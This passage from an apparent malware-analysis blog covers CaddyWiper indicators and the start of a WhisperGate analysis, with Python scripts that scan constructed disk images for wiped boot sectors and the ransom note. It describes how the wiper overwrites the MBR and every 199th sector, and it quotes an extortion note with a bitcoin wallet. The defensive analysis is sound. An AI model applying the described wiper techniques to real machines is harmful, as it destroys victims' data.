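    return b"\x00" * WIPED_PREFIX_LEN + image[WIPED_PREFIX_LEN:]


if __name__ == "__main__":
    healthy = build_sample_gpt_disk()
    print("healthy:", assess_disk_prefix(healthy))
    print("wiped:  ", assess_disk_prefix(constructed_wiped_image(healthy)))
```

On a real image, read the first 0xA00 bytes of the device dump and pass them to assess_disk_prefix; a GPT-only disk that never had a 0x55AA signature is still caught by the GPT header check.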
After the corruption process is done the system will be rebooted, but won’t be started.</span></p><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">IoCs </span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Files</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="114"></col><col width="482"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">File name</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: 
pre-wrap;">SHA256</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Roboto, sans-serif" style="font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">caddy1.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Roboto, sans-serif" style="color: #4d4d4d; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea</span></p></td></tr></tbody></table></div><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MITRE attack techniques</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="149"></col><col width="499"></col></colgroup><tbody><tr style="height: 33pt;"><td 
style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Tactic</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Technique</span></p></td></tr><tr style="height: 39.75pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Defense evasion</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; 
vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1140/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1140 – Deobfuscate/Decode Files or Information</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1027/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1027 – Obfuscated Files or Information</span></a></p></td></tr><tr style="height: 43.7506pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovery</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 10pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1083/" 
style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1083 – File and Directory Discovery</span></a></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1082/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1082 - System Information Discovery</span></a></p></td></tr><tr style="height: 24.75pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Impact</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1485/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; 
text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1485 – Data Destruction</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1529/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1529 – System Shutdown/Reboot</span></a></p></td></tr></tbody></table></div><br /><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">References</span></h2><ol style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; 
font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea/details" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.virustotal.com/gui/file/a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea/details</span></a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://app.any.run/tasks/399165f5-4f4d-417f-93dd-077718d81512/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://app.any.run/tasks/399165f5-4f4d-417f-93dd-077718d81512/</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li></ol></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-88510594800683141252022-01-26T11:20:00.017-08:002022-03-17T23:23:17.020-07:00Analysis of WhisperGate<p><img height="647" 
src="https://lh6.googleusercontent.com/63G4wuVNdgkBVrdR4WddVkmB3jN8erVT9TpHIhDGwWMXjVvtwh67tno6m_IqeQCEHbaR3Ie6PP6tH068AXELalZ38PuemlQIPrnZ8weBd6FVZSBaQcEJJ9syQHdUTZRh4hS1swox" style="font-family: Arial; font-size: 14.6667px; margin-left: 0px; margin-top: 0px; text-align: center; white-space: pre-wrap;" width="624" /> </p><p><span style="font-family: Arial; font-size: 16pt; text-align: justify; white-space: pre-wrap;">Summary of the attack</span></p><span id="docs-internal-guid-c6f295ee-7fff-8260-54e9-28b726a3bd6a"><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Name: WhisperGate</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovered in January 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: 
baseline; white-space: pre-wrap;">Used in a targeted attack against Ukrainian government websites on the 14th of January, 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Overwrites the contents of files with a fixed number of bytes</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Rewrites the MBR, corrupts victims’ files, and downloads and drops its own files</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Corrupted files have a random 4-byte extension</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" 
role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Comes in two stages: a PE64 executable written in C++ and a .NET application with fake digital signatures</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The third stage is a .NET DLL, which is downloaded at runtime</span></p></li></ul><div style="text-align: right;"><i style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">by Denis Popov and Alexander Adamov</i></div><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Introduction</span></h2><p 
dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">On January 13, 2022, multiple government sites in Ukraine were shut down due to a large-scale cyberattack by the WhisperGate malware. In particular, the websites of the Cabinet of Ministers, the Ministry of Foreign Affairs, the Ministry of Sports, the Ministry of Energy, the Ministry of Agrarian Policy, the Ministry of Veterans Affairs, the website of the State Treasury, and the state services website Diya stopped working. All users were shown a note with the following warning:</span></p><blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><i>"Ukrainian! All your personal data has been uploaded to the public network. All data on the computer is destroyed, it is impossible to recover them. All information about you has become public, be afraid and expect the worst. This is for your past, present and future. 
For Volyn, for the OUN UPA, for Galicia, for Polissya, and for historical lands."</i></span></p></blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Microsoft threat intelligence named this activity "DEV-0586" and identified it as destructive malware disguised as ransomware. Its main purpose is to disrupt the system and damage files beyond recovery.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Technical Details</span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Defacement of the government websites</span></h3><p style="text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">Two types of defacement attacks have been discovered by CERT-UA:</span></p><ul style="text-align: left;"><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">Complete replacement of the main page (index.php)</span></li><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: 
normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">Injection of a malicious script into the website that replaces its content</span></li></ul><p style="text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">The suspected attack vectors are:</span></p><ul style="text-align: left;"><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">a supply chain attack</span></li><li><span style="color: #141519; font-family: Arial; font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: justify; vertical-align: baseline; white-space: pre-wrap;">exploitation of OctoberCMS and/or Log4j vulnerabilities</span></li></ul><div style="text-align: justify;"><span style="color: #141519; font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The traces of the commands executed by the attackers are shown below:</span></span></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEiEIrTISpgDQnyW5Maa_RpfRLt6-869XOyafVHknOFG7Sx2PRrZkK5d3ORW-9EaUcLKi7oAE82OQafASfw00PGiNyg7Bm-aktq2V2skcepjwRgd6ZhfN5BxXDtuNyfbeCSujoSTSa-EXnErw26HygeY8un-EhlKEIvYyAixQolzuG4vPpTTZ1klcCPbmA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="232" data-original-width="609" src="https://blogger.googleusercontent.com/img/a/AVvXsEiEIrTISpgDQnyW5Maa_RpfRLt6-869XOyafVHknOFG7Sx2PRrZkK5d3ORW-9EaUcLKi7oAE82OQafASfw00PGiNyg7Bm-aktq2V2skcepjwRgd6ZhfN5BxXDtuNyfbeCSujoSTSa-EXnErw26HygeY8un-EhlKEIvYyAixQolzuG4vPpTTZ1klcCPbmA=s16000" /></a></div><div style="text-align: center;"><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">.bash_history (source: </em><span style="letter-spacing: 0.32px; text-align: left;"><span face="ProbaPro, sans-serif" style="color: #212529;"><i>https://cert.gov.ua/article/18101</i></span></span><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">)</em></div></div><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MBR Writer (stage1.exe)</span></h3><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The threat actor uses the Impacket tool collection for lateral movement and malware execution. The first file ‘stage1.exe’ is a PE64 executable written in C++ and compiled with the MinGW compiler. This file can be placed in different directories, for example, C:\PerfLogs, C:\ProgramData, C:\, or C:\temp. At the beginning of execution, the malware obtains access to the <i>‘\\\\.\\PhysicalDrive0’</i> device, which contains the Master Boot Record (MBR). Then it writes the hardcoded ransom note to the MBR area as well as to every 199th sector of the disk. 
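</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">As an added example, not code from the original post: a Python check a responder can run over a raw disk image to locate the sectors carrying the hardcoded note, using the MBR-plus-every-199th-sector layout described above. The image is a constructed in-memory fixture (no real disk is touched), the marker string is the first line of the note quoted in this post, and the offset of the note text inside a sector is an assumption.</span></p>

```python
import io

SECTOR_SIZE = 512
NOTE_STRIDE = 199  # the post reports the note in the MBR and in every 199th sector
# First line of the hardcoded ransom note reproduced in this post.
NOTE_MARKER = b"Your hard drive has been corrupted."


def build_constructed_image(total_sectors, note_sectors):
    """Constructed test fixture: a raw image with fake file data in every
    sector and the note marker planted in the given sectors. This only builds
    bytes in memory; nothing here touches a real disk."""
    img = bytearray(total_sectors * SECTOR_SIZE)
    img[510:512] = b"\x55\xaa"  # boot signature so sector 0 looks like an MBR
    for s in range(1, total_sectors):
        off = s * SECTOR_SIZE
        img[off:off + 8] = b"DATA%04d" % s
    for s in note_sectors:
        # Assumed offset: the note text follows a small boot stub, not offset 0.
        off = s * SECTOR_SIZE + 0x40
        img[off:off + len(NOTE_MARKER)] = NOTE_MARKER
    return bytes(img)


def find_note_sectors(stream):
    """Scan a raw disk image sector by sector and return the numbers of the
    sectors that contain the note marker. `stream` is any binary file-like
    object, e.g. open('disk.img', 'rb') or io.BytesIO(data)."""
    hits = []
    sector_no = 0
    while True:
        sector = stream.read(SECTOR_SIZE)
        if not sector:
            break
        if NOTE_MARKER in sector:
            hits.append(sector_no)
        sector_no += 1
    return hits


def matches_whispergate_pattern(hits):
    """True when the MBR (sector 0) carries the note and every hit lies on the
    199-sector stride, i.e. the layout this post attributes to stage1.exe."""
    return bool(hits) and hits[0] == 0 and all(h % NOTE_STRIDE == 0 for h in hits)


def scan_image_bytes(data):
    """Convenience wrapper for an in-memory image; returns (hits, is_pattern)."""
    hits = find_note_sectors(io.BytesIO(data))
    return hits, matches_whispergate_pattern(hits)


if __name__ == "__main__":
    # Constructed example: a 1000-sector image with the note at the stride positions.
    infected = build_constructed_image(1000, range(0, 1000, NOTE_STRIDE))
    hits, is_pattern = scan_image_bytes(infected)
    print("note found in sectors:", hits)            # [0, 199, 398, 597, 796, 995]
    print("matches stage1.exe layout:", is_pattern)  # True
```

<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">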
Because the MBR has been overwritten, the system will not boot after a restart; instead, the ransom note is displayed.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The hardcoded ransom note:</span></p><blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Your hard drive has been corrupted.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">In case you want to recover all hard drives</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">of your organization,</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">You should pay us $10k via bitcoin wallet</span></p><p 
dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">with your organization name.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">We will contact you to give further instructions.</span></p></blockquote><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 251px; overflow: hidden; width: 
